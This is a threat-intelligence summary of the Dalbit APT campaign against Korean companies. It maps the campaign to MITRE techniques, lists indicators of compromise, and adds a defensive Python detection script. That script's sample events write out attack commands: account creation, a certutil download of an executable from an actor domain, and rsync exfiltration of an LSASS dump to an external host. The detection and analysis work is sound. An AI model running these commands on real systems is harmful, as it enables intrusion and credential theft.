Dalbit (m00nlight): Chinese Hacker Group’s APT Attack Campaign – ASEC BLOG

Dalbit (Moonlight) is a threat group tracked by AhnLab’s ASEC. Since 2022 it has conducted 50+ attacks against Korean companies using open-source tools, WebShells, and proxy-based C2 infrastructure under *.m00nlight.top. An operation progresses from initial access via vulnerable servers to C2/download servers, proxy-based lateral movement, credential theft, and in some cases BitLocker encryption for impact; the compromised proxy hosts are occasionally reused as gateways for infecting further victims. #Dalbit #MoonlightTop

Keypoints

  • Dalbit (Moonlight.top) has made 50+ confirmed attack attempts against Korean companies since 2022.
  • The group gains initial access by exploiting web/SQL vulnerabilities and deploying WebShells (Godzilla, ASPXSpy, AntSword, China Chopper).
  • They download hacking tools through default Windows programs (Certutil, Bitsadmin) after WebShell access.
  • Proxy tools FRP and LCX (and others) are used to establish C2 and enable Remote Desktop-based lateral movement.
  • Account creation and credential theft (e.g., adding a user named “main” and using stolen admin credentials) support persistence and privilege escalation.
  • Internal reconnaissance uses network scanners (FScan, NBTScan, Goon) and information collection from endpoints and emails.
  • Data exfiltration uses Rsync; credential dumps (LSASS) and email extraction tools are employed.
  • BitLocker is used to encrypt drives; defense evasion includes VMProtect packing, deletion of Windows security event logs, and turning the firewall off.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – Dalbit uses WebShells to gain access and run commands, including launching tooling via web server processes. Quote: “Initial Access … they gain access to by exploiting vulnerabilities. They then attempt to control the systems with tools such as WebShell.”
  • [T1105] Ingress Tool Transfer – The threat actor downloads hacking tools through default Windows programs after WebShell access. Quote: “The threat actor downloads other hacking tools through default Windows programs.”
  • [T1562] Impair Defenses – VMProtect packing to evade detection and deletion of security logs; firewall turned off. Quote: “VMProtect is used to prevent hacking tools from being detected” and “Security event logs are deleted” / “Firewall OFF.”
  • [T1053] Scheduled Task/Job – FRP is registered in Task Scheduler (schtasks) to sustain persistence. Quote: “the FRP was registered to the task scheduler (schtasks) under the name ‘debug’ to maintain its persistence.”
  • [T1136] Create Account – The group creates a new user account (e.g., “main”) for persistence. Quote: “net user main ff0.123456 /add & net localgroup administrators main /add.”
  • [T1078] Valid Accounts – The threat actor uses stolen admin accounts in addition to newly created ones. Quote: “Aside from adding accounts, the threat actor would also use stolen admin accounts.”
  • [T1114] Email Collection – A Golang email extraction tool targets Exchange and saves emails as EML files. Quote: “extract every email from the mailboxes of the target account according to the time received as an argument and saves them as an EML file.”
  • [T1113] Screen Capture – Screenshots from infected PCs are sent to the actor’s server. Quote: “screenshots from a certain company’s infiltrated PC sent pictures every 5-10 seconds.”
  • [T1003] OS Credential Dumping – LSASS credential dumping via Dumpert/Procdump and then Rsync to exfiltrate. Quote: “LSASS Dump information and EML files of certain accounts are usually the information that is stolen” and “The threat actor used Dumpert … to dump the lsass.exe process.”
  • [T1021] Remote Services – Lateral movement via RDP after establishing proxy connections. Quote: “connect to … via Remote Desktop (RDP)”
  • [T1046] Network Service Discovery – Internal reconnaissance uses network scanning tools (FScan, NBTScan, Goon). Quote: “Internal Reconnaissance: Tools such as network scanning tools and account theft tools are used for internal reconnaissance and obtaining information.”
  • [T1027] Obfuscated/Compressed Files and Information – VMProtect packing of binaries to evade detection. Quote: “VMProtect Packing” and related evasion notes.
  • [T1567] Exfiltration – Exfiltration of data via Rsync to attacker server. Quote: “rsync … to send the dump file to their own server.”
  • [T1486] Data Encrypted for Impact – BitLocker is used to encrypt drives and demand ransom. Quote: “BitLocker to encrypt certain drives and demand a ransom.”
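A defender-side detection sketch for the process-creation behaviours listed above, added here as an example and not part of the ASEC write-up. It assumes Sysmon/4688-style events with ParentImage and CommandLine fields; the exact tool flags, the wevtutil/netsh commands used for log clearing and firewall disabling, and the web-worker parent names are assumptions rather than values quoted from the report.

```python
import re
from typing import Dict, List, Tuple

# Rules: regex over the process command line -> technique the ASEC write-up
# attributes to Dalbit. Exact tool flags, the "wevtutil"/"netsh" commands and
# the web-worker parent names are assumptions, not values quoted from the report.
RULES = [
    ("T1105", "LOLBin download (certutil/bitsadmin)",
     re.compile(r"\b(certutil|bitsadmin)(\.exe)?\b.*https?://", re.I)),
    ("T1053", "FRP persisted via schtasks task 'debug'",
     re.compile(r"\bschtasks(\.exe)?\b.*/create\b.*/tn\s+\"?debug\"?", re.I)),
    ("T1136", "local account creation / admin group add",
     re.compile(r"\bnet1?(\.exe)?\s+(user\s+\S+\s+\S+\s+/add|localgroup\s+administrators\s+\S+\s+/add)", re.I)),
    ("T1567", "rsync exfiltration",
     re.compile(r"\brsync(\.exe)?\b", re.I)),
    ("T1562", "security log clearing / firewall off",
     re.compile(r"(wevtutil(\.exe)?\s+cl\s+security|netsh\b.*advfirewall\b.*\bstate\s+off)", re.I)),
    ("IOC", "file name listed in the report",
     re.compile(r"\b(frpc\.exe|frpc\S*\.ini|update\.exe)\b", re.I)),
]
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "php-cgi.exe"}  # assumed WebShell parent processes

def match_event(event: Dict[str, str]) -> List[str]:
    """Return the technique tags that fire for one process-creation event."""
    cmd = event.get("CommandLine", "")
    hits = [f"{tid} {desc}" for tid, desc, rx in RULES if rx.search(cmd)]
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if parent in WEB_WORKERS:  # any child of a web worker deserves a look
        hits.append("T1059 process spawned by web server worker (WebShell)")
    return hits

def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Index every event that triggers at least one rule."""
    return [(i, h) for i, e in enumerate(events) if (h := match_event(e))]

# Constructed sample events in Sysmon/4688 style; they are not log data from the report.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": r"cmd.exe /c certutil -urlcache -split -f http://aa.zxcss.com/update.exe C:\Windows\Temp\update.exe"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"schtasks /create /sc minute /mo 5 /tn debug /tr C:\Windows\Temp\frpc.exe"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "net user main ff0.123456 /add"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"rsync -av C:\Windows\Temp\lsass.dmp backup@203.0.113.10:/in/"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
]
```

Running scan(SAMPLE_EVENTS) flags the first four events and leaves the benign notepad launch untouched; in production the rules would be fed from the EDR or SIEM process-creation feed rather than the inline list.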

Indicators of Compromise

  • [IP Address] – 91.217.139.117, 205.185.122.95
  • [Domain] – m00nlight.top, aa.zxcss.com
  • [File Hash] – 0359a857a22c8e93bc43caea07d07e23, 85a6e4448f4e5be1aa135861a2c35d35
  • [File Name] – update.exe, frpc.exe
  • [File Name] – frpc.ini, frpc__2381.ini (examples from FRP configs)

Read more: https://asec.ahnlab.com/en/47455/